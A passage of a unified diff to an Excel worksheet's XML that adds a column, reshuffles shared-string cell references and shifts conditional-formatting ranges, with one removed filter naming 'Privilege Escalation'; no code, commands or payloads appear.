-    <row r="66" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="C65" t="s">
+        <v>27</v>
+      </c>
+      <c r="D65" s="1" t="s">
+        <v>88</v>
+      </c>
+      <c r="F65" t="s">
+        <v>265</v>
+      </c>
+    </row>
+    <row r="66" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A66">
         <v>24</v>
       </c>
       <c r="B66" t="s">
-        <v>75</v>
-      </c>
-      <c r="C66" s="10" t="s">
-        <v>258</v>
-      </c>
-      <c r="D66" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E66" t="s">
-        <v>257</v>
+        <v>226</v>
+      </c>
+      <c r="C66" t="s">
+        <v>36</v>
+      </c>
+      <c r="D66" s="10" t="s">
+        <v>175</v>
+      </c>
+      <c r="E66" s="6" t="s">
+        <v>24</v>
       </c>
       <c r="F66" t="s">
-        <v>268</v>
-      </c>
-    </row>
-    <row r="67" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
+        <v>294</v>
+      </c>
+      <c r="G66" t="s">
+        <v>182</v>
+      </c>
+    </row>
+    <row r="67" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A67">
         <v>66</v>
       </c>
       <c r="B67" t="s">
-        <v>70</v>
-      </c>
-      <c r="C67" s="1" t="s">
-        <v>137</v>
-      </c>
-      <c r="E67" t="s">
-        <v>138</v>
-      </c>
-    </row>
-    <row r="68" spans="1:6" x14ac:dyDescent="0.25">
+        <v>237</v>
+      </c>
+      <c r="C67" t="s">
+        <v>328</v>
+      </c>
+      <c r="D67" s="1" t="s">
+        <v>81</v>
+      </c>
+      <c r="F67" t="s">
+        <v>240</v>
+      </c>
+    </row>
+    <row r="68" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A68">
         <v>25</v>
       </c>
       <c r="B68" t="s">
-        <v>75</v>
-      </c>
-      <c r="C68" s="1" t="s">
-        <v>190</v>
-      </c>
-      <c r="E68" t="s">
-        <v>79</v>
-      </c>
-    </row>
-    <row r="69" spans="1:6" x14ac:dyDescent="0.25">
+        <v>231</v>
+      </c>
+      <c r="C68" t="s">
+        <v>36</v>
+      </c>
+      <c r="D68" s="1" t="s">
+        <v>126</v>
+      </c>
+      <c r="F68" t="s">
+        <v>230</v>
+      </c>
+    </row>
+    <row r="69" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A69">
         <v>26</v>
       </c>
-      <c r="B69" t="s">
-        <v>75</v>
-      </c>
-      <c r="C69" s="1" t="s">
-        <v>189</v>
-      </c>
-      <c r="D69" s="6" t="s">
-        <v>139</v>
-      </c>
-      <c r="E69" t="s">
-        <v>7</v>
-      </c>
-    </row>
-    <row r="70" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C69" t="s">
+        <v>36</v>
+      </c>
+      <c r="D69" s="1" t="s">
+        <v>125</v>
+      </c>
+      <c r="E69" s="6" t="s">
+        <v>82</v>
+      </c>
+      <c r="F69" t="s">
+        <v>266</v>
+      </c>
+    </row>
+    <row r="70" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A70" s="8">
         <v>69</v>
       </c>
-      <c r="B70" t="s">
-        <v>64</v>
-      </c>
-      <c r="C70" s="1" t="s">
-        <v>81</v>
-      </c>
-      <c r="D70" s="6" t="s">
-        <v>56</v>
-      </c>
-      <c r="E70" t="s">
-        <v>83</v>
-      </c>
-    </row>
-    <row r="71" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
+      <c r="B70" s="8" t="s">
+        <v>343</v>
+      </c>
+      <c r="C70" t="s">
+        <v>325</v>
+      </c>
+      <c r="D70" s="1" t="s">
+        <v>37</v>
+      </c>
+      <c r="E70" s="6" t="s">
+        <v>22</v>
+      </c>
+      <c r="F70" t="s">
+        <v>295</v>
+      </c>
+    </row>
+    <row r="71" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A71">
         <v>70</v>
       </c>
-      <c r="B71" t="s">
-        <v>63</v>
-      </c>
-      <c r="C71" s="1" t="s">
-        <v>82</v>
-      </c>
-      <c r="D71" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E71" t="s">
-        <v>246</v>
-      </c>
-    </row>
-    <row r="72" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C71" t="s">
+        <v>28</v>
+      </c>
+      <c r="D71" s="1" t="s">
+        <v>38</v>
+      </c>
+      <c r="E71" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F71" t="s">
+        <v>311</v>
+      </c>
+    </row>
+    <row r="72" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A72">
         <v>71</v>
       </c>
-      <c r="B72" t="s">
-        <v>71</v>
-      </c>
-      <c r="C72" s="1" t="s">
-        <v>84</v>
-      </c>
-      <c r="E72" t="s">
-        <v>253</v>
-      </c>
-    </row>
-    <row r="73" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C72" t="s">
+        <v>32</v>
+      </c>
+      <c r="D72" s="1" t="s">
+        <v>39</v>
+      </c>
+      <c r="F72" t="s">
+        <v>296</v>
+      </c>
+    </row>
+    <row r="73" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A73">
         <v>72</v>
       </c>
       <c r="B73" t="s">
-        <v>64</v>
-      </c>
-      <c r="C73" s="1" t="s">
-        <v>87</v>
-      </c>
-      <c r="E73" t="s">
-        <v>85</v>
-      </c>
-    </row>
-    <row r="74" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
+        <v>233</v>
+      </c>
+      <c r="C73" t="s">
+        <v>325</v>
+      </c>
+      <c r="D73" s="1" t="s">
+        <v>41</v>
+      </c>
+      <c r="F73" t="s">
+        <v>297</v>
+      </c>
+    </row>
+    <row r="74" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A74">
         <v>73</v>
       </c>
       <c r="B74" t="s">
-        <v>70</v>
-      </c>
-      <c r="C74" s="1" t="s">
-        <v>86</v>
-      </c>
-      <c r="E74" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="75" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
+        <v>337</v>
+      </c>
+      <c r="C74" t="s">
+        <v>331</v>
+      </c>
+      <c r="D74" s="1" t="s">
+        <v>40</v>
+      </c>
+      <c r="F74" t="s">
+        <v>298</v>
+      </c>
+    </row>
+    <row r="75" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A75">
         <v>74</v>
       </c>
       <c r="B75" t="s">
-        <v>70</v>
-      </c>
-      <c r="C75" s="1" t="s">
-        <v>88</v>
-      </c>
-      <c r="D75" s="6" t="s">
-        <v>57</v>
-      </c>
-      <c r="E75" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="76" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
+        <v>340</v>
+      </c>
+      <c r="C75" t="s">
+        <v>331</v>
+      </c>
+      <c r="D75" s="1" t="s">
+        <v>42</v>
+      </c>
+      <c r="E75" s="6" t="s">
+        <v>23</v>
+      </c>
+      <c r="F75" t="s">
+        <v>299</v>
+      </c>
+    </row>
+    <row r="76" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A76">
         <v>75</v>
       </c>
       <c r="B76" t="s">
-        <v>65</v>
-      </c>
-      <c r="C76" s="1" t="s">
-        <v>266</v>
-      </c>
-      <c r="E76" t="s">
-        <v>267</v>
-      </c>
-    </row>
-    <row r="77" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
+        <v>215</v>
+      </c>
+      <c r="C76" t="s">
+        <v>30</v>
+      </c>
+      <c r="D76" s="1" t="s">
+        <v>181</v>
+      </c>
+      <c r="F76" t="s">
+        <v>312</v>
+      </c>
+      <c r="G76" t="s">
+        <v>216</v>
+      </c>
+    </row>
+    <row r="77" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A77">
         <v>76</v>
       </c>
-      <c r="B77" t="s">
-        <v>65</v>
-      </c>
-      <c r="C77" s="1" t="s">
-        <v>91</v>
-      </c>
-      <c r="D77" s="6" t="s">
-        <v>139</v>
-      </c>
-      <c r="E77" t="s">
-        <v>243</v>
-      </c>
-    </row>
-    <row r="78" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C77" t="s">
+        <v>30</v>
+      </c>
+      <c r="D77" s="1" t="s">
+        <v>43</v>
+      </c>
+      <c r="E77" s="6" t="s">
+        <v>82</v>
+      </c>
+      <c r="F77" t="s">
+        <v>313</v>
+      </c>
+    </row>
+    <row r="78" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A78">
         <v>77</v>
       </c>
       <c r="B78" t="s">
-        <v>65</v>
-      </c>
-      <c r="C78" s="1" t="s">
-        <v>92</v>
-      </c>
-      <c r="D78" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E78" t="s">
-        <v>98</v>
-      </c>
-    </row>
-    <row r="79" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
+        <v>209</v>
+      </c>
+      <c r="C78" t="s">
+        <v>30</v>
+      </c>
+      <c r="D78" s="1" t="s">
+        <v>44</v>
+      </c>
+      <c r="E78" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F78" t="s">
+        <v>314</v>
+      </c>
+    </row>
+    <row r="79" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A79">
         <v>78</v>
       </c>
-      <c r="B79" t="s">
-        <v>65</v>
-      </c>
-      <c r="C79" s="1" t="s">
-        <v>95</v>
-      </c>
-      <c r="D79" s="6" t="s">
-        <v>139</v>
-      </c>
-      <c r="E79" t="s">
-        <v>94</v>
-      </c>
-    </row>
-    <row r="80" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C79" t="s">
+        <v>315</v>
+      </c>
+      <c r="D79" s="1" t="s">
+        <v>46</v>
+      </c>
+      <c r="E79" s="6" t="s">
+        <v>82</v>
+      </c>
+      <c r="F79" t="s">
+        <v>45</v>
+      </c>
+    </row>
+    <row r="80" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A80">
         <v>79</v>
       </c>
-      <c r="B80" t="s">
-        <v>71</v>
-      </c>
-      <c r="C80" s="1" t="s">
-        <v>97</v>
-      </c>
-      <c r="E80" t="s">
-        <v>96</v>
-      </c>
-    </row>
-    <row r="81" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C80" t="s">
+        <v>32</v>
+      </c>
+      <c r="D80" s="1" t="s">
+        <v>48</v>
+      </c>
+      <c r="F80" t="s">
+        <v>47</v>
+      </c>
+    </row>
+    <row r="81" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A81">
         <v>80</v>
       </c>
-      <c r="B81" t="s">
-        <v>73</v>
-      </c>
-      <c r="C81" s="1" t="s">
-        <v>126</v>
-      </c>
-      <c r="E81" t="s">
-        <v>237</v>
-      </c>
-    </row>
-    <row r="82" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C81" t="s">
+        <v>35</v>
+      </c>
+      <c r="D81" s="1" t="s">
+        <v>75</v>
+      </c>
+      <c r="F81" t="s">
+        <v>163</v>
+      </c>
+    </row>
+    <row r="82" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A82">
         <v>81</v>
       </c>
       <c r="B82" t="s">
-        <v>65</v>
-      </c>
-      <c r="C82" s="1" t="s">
-        <v>127</v>
-      </c>
-      <c r="D82" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E82" t="s">
-        <v>245</v>
-      </c>
-    </row>
-    <row r="83" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>212</v>
+      </c>
+      <c r="C82" t="s">
+        <v>30</v>
+      </c>
+      <c r="D82" s="1" t="s">
+        <v>76</v>
+      </c>
+      <c r="E82" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F82" t="s">
+        <v>168</v>
+      </c>
+    </row>
+    <row r="83" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A83">
         <v>82</v>
       </c>
       <c r="B83" t="s">
-        <v>65</v>
-      </c>
-      <c r="C83" s="1" t="s">
-        <v>128</v>
-      </c>
-      <c r="D83" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E83" t="s">
-        <v>244</v>
-      </c>
-    </row>
-    <row r="84" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>210</v>
+      </c>
+      <c r="C83" t="s">
+        <v>30</v>
+      </c>
+      <c r="D83" s="1" t="s">
+        <v>77</v>
+      </c>
+      <c r="E83" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F83" t="s">
+        <v>167</v>
+      </c>
+    </row>
+    <row r="84" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A84">
         <v>83</v>
       </c>
       <c r="B84" t="s">
-        <v>69</v>
-      </c>
-      <c r="C84" s="1" t="s">
-        <v>129</v>
-      </c>
-    </row>
-    <row r="85" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>206</v>
+      </c>
+      <c r="C84" t="s">
+        <v>34</v>
+      </c>
+      <c r="D84" s="1" t="s">
+        <v>78</v>
+      </c>
+    </row>
+    <row r="85" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A85">
         <v>84</v>
       </c>
-      <c r="B85" t="s">
-        <v>65</v>
-      </c>
-      <c r="C85" s="1" t="s">
-        <v>130</v>
-      </c>
-      <c r="E85" t="s">
-        <v>221</v>
-      </c>
-    </row>
-    <row r="86" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C85" t="s">
+        <v>30</v>
+      </c>
+      <c r="D85" s="1" t="s">
+        <v>79</v>
+      </c>
+      <c r="F85" t="s">
+        <v>300</v>
+      </c>
+    </row>
+    <row r="86" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A86">
         <v>85</v>
       </c>
-      <c r="B86" t="s">
-        <v>65</v>
-      </c>
-      <c r="C86" s="1" t="s">
-        <v>141</v>
-      </c>
-      <c r="D86" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E86" t="s">
-        <v>222</v>
-      </c>
-    </row>
-    <row r="87" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C86" t="s">
+        <v>30</v>
+      </c>
+      <c r="D86" s="1" t="s">
+        <v>84</v>
+      </c>
+      <c r="E86" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F86" t="s">
+        <v>151</v>
+      </c>
+    </row>
+    <row r="87" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A87">
         <v>86</v>
       </c>
       <c r="B87" t="s">
-        <v>70</v>
-      </c>
-      <c r="C87" s="1" t="s">
-        <v>142</v>
-      </c>
-      <c r="E87" t="s">
-        <v>142</v>
-      </c>
-    </row>
-    <row r="88" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>338</v>
+      </c>
+      <c r="C87" t="s">
+        <v>331</v>
+      </c>
+      <c r="D87" s="1" t="s">
+        <v>85</v>
+      </c>
+      <c r="F87" t="s">
+        <v>85</v>
+      </c>
+    </row>
+    <row r="88" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A88">
         <v>87</v>
       </c>
-      <c r="B88" t="s">
-        <v>68</v>
-      </c>
-      <c r="C88" s="1" t="s">
-        <v>151</v>
-      </c>
-      <c r="E88" t="s">
-        <v>144</v>
-      </c>
-    </row>
-    <row r="89" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C88" t="s">
+        <v>33</v>
+      </c>
+      <c r="D88" s="1" t="s">
+        <v>90</v>
+      </c>
+      <c r="F88" t="s">
+        <v>301</v>
+      </c>
+    </row>
+    <row r="89" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A89">
         <v>88</v>
       </c>
-      <c r="B89" t="s">
-        <v>73</v>
-      </c>
-      <c r="C89" s="1" t="s">
-        <v>152</v>
-      </c>
-      <c r="E89" t="s">
-        <v>145</v>
-      </c>
-    </row>
-    <row r="90" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C89" t="s">
+        <v>35</v>
+      </c>
+      <c r="D89" s="1" t="s">
+        <v>91</v>
+      </c>
+      <c r="F89" t="s">
+        <v>302</v>
+      </c>
+    </row>
+    <row r="90" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A90">
         <v>89</v>
       </c>
-      <c r="B90" t="s">
-        <v>73</v>
-      </c>
       <c r="C90" t="s">
-        <v>153</v>
-      </c>
-      <c r="E90" t="s">
-        <v>212</v>
-      </c>
-    </row>
-    <row r="91" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>35</v>
+      </c>
+      <c r="D90" t="s">
+        <v>92</v>
+      </c>
+      <c r="F90" t="s">
+        <v>274</v>
+      </c>
+    </row>
+    <row r="91" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A91">
         <v>90</v>
       </c>
-      <c r="B91" t="s">
-        <v>73</v>
-      </c>
       <c r="C91" t="s">
-        <v>154</v>
-      </c>
-      <c r="E91" t="s">
-        <v>146</v>
-      </c>
-    </row>
-    <row r="92" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>35</v>
+      </c>
+      <c r="D91" t="s">
+        <v>93</v>
+      </c>
+      <c r="F91" t="s">
+        <v>303</v>
+      </c>
+    </row>
+    <row r="92" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A92">
         <v>91</v>
       </c>
-      <c r="B92" t="s">
-        <v>63</v>
-      </c>
-      <c r="C92" s="1" t="s">
-        <v>213</v>
-      </c>
-      <c r="E92" t="s">
-        <v>216</v>
-      </c>
-    </row>
-    <row r="93" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C92" t="s">
+        <v>28</v>
+      </c>
+      <c r="D92" s="1" t="s">
+        <v>147</v>
+      </c>
+      <c r="F92" t="s">
+        <v>304</v>
+      </c>
+    </row>
+    <row r="93" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A93">
         <v>92</v>
       </c>
-      <c r="B93" t="s">
-        <v>68</v>
-      </c>
-      <c r="C93" s="1" t="s">
-        <v>214</v>
-      </c>
-      <c r="E93" t="s">
-        <v>252</v>
-      </c>
-    </row>
-    <row r="94" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+      <c r="B93" s="8" t="s">
+        <v>343</v>
+      </c>
+      <c r="C93" t="s">
+        <v>325</v>
+      </c>
+      <c r="D93" s="1" t="s">
+        <v>148</v>
+      </c>
+      <c r="F93" t="s">
+        <v>174</v>
+      </c>
+    </row>
+    <row r="94" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A94">
         <v>93</v>
       </c>
       <c r="B94" t="s">
-        <v>70</v>
-      </c>
-      <c r="C94" s="1" t="s">
-        <v>226</v>
-      </c>
-      <c r="E94" t="s">
-        <v>229</v>
-      </c>
-    </row>
-    <row r="95" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>339</v>
+      </c>
+      <c r="C94" t="s">
+        <v>331</v>
+      </c>
+      <c r="D94" s="1" t="s">
+        <v>152</v>
+      </c>
+      <c r="F94" t="s">
+        <v>155</v>
+      </c>
+    </row>
+    <row r="95" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A95">
         <v>94</v>
       </c>
       <c r="B95" t="s">
-        <v>64</v>
-      </c>
-      <c r="C95" s="1" t="s">
-        <v>228</v>
-      </c>
-      <c r="E95" t="s">
-        <v>227</v>
-      </c>
-    </row>
-    <row r="96" spans="1:5" x14ac:dyDescent="0.25">
+        <v>335</v>
+      </c>
+      <c r="C95" t="s">
+        <v>331</v>
+      </c>
+      <c r="D95" s="1" t="s">
+        <v>154</v>
+      </c>
+      <c r="F95" t="s">
+        <v>153</v>
+      </c>
+    </row>
+    <row r="96" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A96">
         <v>29</v>
       </c>
       <c r="B96" t="s">
-        <v>75</v>
-      </c>
-      <c r="C96" s="1" t="s">
-        <v>186</v>
-      </c>
-      <c r="E96" t="s">
-        <v>23</v>
-      </c>
-    </row>
-    <row r="97" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>225</v>
+      </c>
+      <c r="C96" t="s">
+        <v>36</v>
+      </c>
+      <c r="D96" s="1" t="s">
+        <v>122</v>
+      </c>
+      <c r="F96" t="s">
+        <v>305</v>
+      </c>
+    </row>
+    <row r="97" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A97">
         <v>96</v>
       </c>
       <c r="B97" t="s">
-        <v>63</v>
-      </c>
-      <c r="C97" s="1" t="s">
-        <v>233</v>
-      </c>
-      <c r="E97" t="s">
-        <v>234</v>
-      </c>
-    </row>
-    <row r="98" spans="1:5" x14ac:dyDescent="0.25">
+        <v>338</v>
+      </c>
+      <c r="C97" t="s">
+        <v>331</v>
+      </c>
+      <c r="D97" s="1" t="s">
+        <v>159</v>
+      </c>
+      <c r="F97" t="s">
+        <v>160</v>
+      </c>
+    </row>
+    <row r="98" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A98">
         <v>68</v>
       </c>
       <c r="B98" t="s">
-        <v>75</v>
-      </c>
-      <c r="C98" s="1" t="s">
-        <v>150</v>
-      </c>
-      <c r="E98" t="s">
-        <v>80</v>
-      </c>
-    </row>
-    <row r="99" spans="1:5" x14ac:dyDescent="0.25">
+        <v>227</v>
+      </c>
+      <c r="C98" t="s">
+        <v>27</v>
+      </c>
+      <c r="D98" s="1" t="s">
+        <v>89</v>
+      </c>
+      <c r="F98" t="s">
+        <v>306</v>
+      </c>
+    </row>
+    <row r="99" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A99">
         <v>98</v>
       </c>
       <c r="B99" t="s">
-        <v>75</v>
-      </c>
-      <c r="C99" s="1" t="s">
-        <v>157</v>
-      </c>
-      <c r="E99" t="s">
-        <v>236</v>
-      </c>
-    </row>
-    <row r="100" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>228</v>
+      </c>
+      <c r="C99" t="s">
+        <v>36</v>
+      </c>
+      <c r="D99" s="1" t="s">
+        <v>95</v>
+      </c>
+      <c r="F99" t="s">
+        <v>162</v>
+      </c>
+    </row>
+    <row r="100" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A100">
         <v>99</v>
       </c>
       <c r="B100" t="s">
-        <v>64</v>
-      </c>
-      <c r="C100" s="1" t="s">
-        <v>238</v>
-      </c>
-      <c r="D100" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E100" t="s">
-        <v>239</v>
-      </c>
-    </row>
-    <row r="101" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>342</v>
+      </c>
+      <c r="C100" t="s">
+        <v>325</v>
+      </c>
+      <c r="D100" s="1" t="s">
+        <v>164</v>
+      </c>
+      <c r="E100" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F100" t="s">
+        <v>165</v>
+      </c>
+    </row>
+    <row r="101" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A101">
         <v>100</v>
       </c>
       <c r="B101" t="s">
-        <v>65</v>
-      </c>
-      <c r="C101" s="1" t="s">
-        <v>247</v>
-      </c>
-      <c r="D101" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E101" t="s">
-        <v>248</v>
-      </c>
-    </row>
-    <row r="102" spans="1:5" x14ac:dyDescent="0.25">
+        <v>211</v>
+      </c>
+      <c r="C101" t="s">
+        <v>30</v>
+      </c>
+      <c r="D101" s="1" t="s">
+        <v>169</v>
+      </c>
+      <c r="E101" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F101" t="s">
+        <v>170</v>
+      </c>
+    </row>
+    <row r="102" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A102">
         <v>101</v>
       </c>
       <c r="B102" t="s">
-        <v>75</v>
-      </c>
-      <c r="C102" s="1" t="s">
-        <v>260</v>
-      </c>
-      <c r="D102" s="6" t="s">
-        <v>56</v>
-      </c>
-      <c r="E102" t="s">
-        <v>259</v>
-      </c>
-    </row>
-    <row r="103" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>224</v>
+      </c>
+      <c r="C102" t="s">
+        <v>36</v>
+      </c>
+      <c r="D102" s="1" t="s">
+        <v>177</v>
+      </c>
+      <c r="E102" s="6" t="s">
+        <v>22</v>
+      </c>
+      <c r="F102" t="s">
+        <v>176</v>
+      </c>
+    </row>
+    <row r="103" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A103">
         <v>102</v>
       </c>
-      <c r="B103" t="s">
-        <v>73</v>
-      </c>
-      <c r="C103" s="1" t="s">
-        <v>261</v>
-      </c>
-      <c r="E103" t="s">
-        <v>262</v>
+      <c r="C103" t="s">
+        <v>35</v>
+      </c>
+      <c r="D103" s="1" t="s">
+        <v>178</v>
+      </c>
+      <c r="F103" t="s">
+        <v>179</v>
+      </c>
+    </row>
+    <row r="104" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A104">
+        <v>103</v>
+      </c>
+      <c r="B104" t="s">
+        <v>221</v>
+      </c>
+      <c r="C104" t="s">
+        <v>27</v>
+      </c>
+      <c r="D104" s="1" t="s">
+        <v>184</v>
+      </c>
+      <c r="F104" t="s">
+        <v>183</v>
+      </c>
+    </row>
+    <row r="105" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A105">
+        <v>104</v>
+      </c>
+      <c r="B105" t="s">
+        <v>221</v>
+      </c>
+      <c r="C105" t="s">
+        <v>27</v>
+      </c>
+      <c r="D105" s="1" t="s">
+        <v>185</v>
+      </c>
+      <c r="F105" t="s">
+        <v>186</v>
+      </c>
+    </row>
+    <row r="106" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="C106" t="s">
+        <v>315</v>
+      </c>
+      <c r="D106" s="1" t="s">
+        <v>189</v>
+      </c>
+      <c r="F106" t="s">
+        <v>191</v>
+      </c>
+    </row>
+    <row r="107" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="B107" t="s">
+        <v>198</v>
+      </c>
+      <c r="C107" t="s">
+        <v>33</v>
+      </c>
+      <c r="D107" s="1" t="s">
+        <v>195</v>
+      </c>
+      <c r="F107" t="s">
+        <v>194</v>
+      </c>
+    </row>
+    <row r="108" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="C108" t="s">
+        <v>315</v>
+      </c>
+      <c r="D108" s="1" t="s">
+        <v>197</v>
+      </c>
+      <c r="F108" t="s">
+        <v>196</v>
+      </c>
+    </row>
+    <row r="109" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="B109" t="s">
+        <v>212</v>
+      </c>
+      <c r="C109" t="s">
+        <v>30</v>
+      </c>
+      <c r="D109" s="1" t="s">
+        <v>214</v>
+      </c>
+      <c r="E109" s="6" t="s">
+        <v>22</v>
+      </c>
+      <c r="F109" t="s">
+        <v>213</v>
+      </c>
+    </row>
+    <row r="110" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="B110" t="s">
+        <v>220</v>
+      </c>
+      <c r="C110" t="s">
+        <v>30</v>
+      </c>
+      <c r="D110" s="1" t="s">
+        <v>218</v>
+      </c>
+      <c r="E110" s="6" t="s">
+        <v>22</v>
+      </c>
+      <c r="F110" t="s">
+        <v>219</v>
+      </c>
+    </row>
+    <row r="111" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="C111" t="s">
+        <v>28</v>
+      </c>
+      <c r="D111" s="1" t="s">
+        <v>229</v>
+      </c>
+      <c r="E111" s="6" t="s">
+        <v>22</v>
+      </c>
+      <c r="F111" t="s">
+        <v>229</v>
       </c>
     </row>
   </sheetData>
-  <autoFilter ref="A1:E103" xr:uid="{873B811C-17E0-44D6-BE49-771EF1C74A88}">
-    <filterColumn colId="1">
-      <filters>
-        <filter val="Privilege Escalation"/>
-      </filters>
-    </filterColumn>
-    <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A24:E102">
-      <sortCondition ref="B1:B103"/>
+  <autoFilter ref="A1:F111" xr:uid="{873B811C-17E0-44D6-BE49-771EF1C74A88}">
+    <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A24:F102">
+      <sortCondition ref="C1:C103"/>
     </sortState>
   </autoFilter>
-  <conditionalFormatting sqref="D2:D305">
+  <conditionalFormatting sqref="E2:E305">
     <cfRule type="cellIs" dxfId="57" priority="53" operator="equal">
-      <formula>$S$7</formula>
+      <formula>$T$7</formula>
     </cfRule>
     <cfRule type="cellIs" dxfId="56" priority="54" operator="equal">
-      <formula>$S$6</formula>
+      <formula>$T$6</formula>
     </cfRule>
     <cfRule type="cellIs" dxfId="55" priority="55" operator="equal">
-      <formula>$S$5</formula>
+      <formula>$T$5</formula>
     </cfRule>
   </conditionalFormatting>
-  <conditionalFormatting sqref="D2:D8">
+  <conditionalFormatting sqref="E2:E9 E51:E52 E40:E41 E33:E36 E11:E16 E18:E31 E43:E49 E76:E81 E63:E74">
     <cfRule type="cellIs" dxfId="54" priority="52" operator="equal">
-      <formula>$S$8</formula>
+      <formula>$T$8</formula>
     </cfRule>
   </conditionalFormatting>
-  <conditionalFormatting sqref="D4:D154">
+  <conditionalFormatting sqref="E4:E154">
     <cfRule type="cellIs" dxfId="53" priority="51" operator="equal">
-      <formula>$S$8</formula>
+      <formula>$T$8</formula>
     </cfRule>
   </conditionalFormatting>
-  <conditionalFormatting sqref="D2">
+  <conditionalFormatting sqref="E2">
     <cfRule type="cellIs" dxfId="52" priority="50" operator="equal">
-      <formula>$S$8</formula>
+      <formula>$T$8</formula>
     </cfRule>
   </conditionalFormatting>
-  <conditionalFormatting sqref="D9">
+  <conditionalFormatting sqref="E9">
     <cfRule type="cellIs" dxfId="51" priority="49" operator="equal">
-      <formula>$S$8</formula>
+      <formula>$T$8</formula>
     </cfRule>
   </conditionalFormatting>
-  <conditionalFormatting sqref="D11 D9">
+  <conditionalFormatting sqref="E11">
     <cfRule type="cellIs" dxfId="50" priority="48" operator="equal">
-      <formula>$S$8</formula>
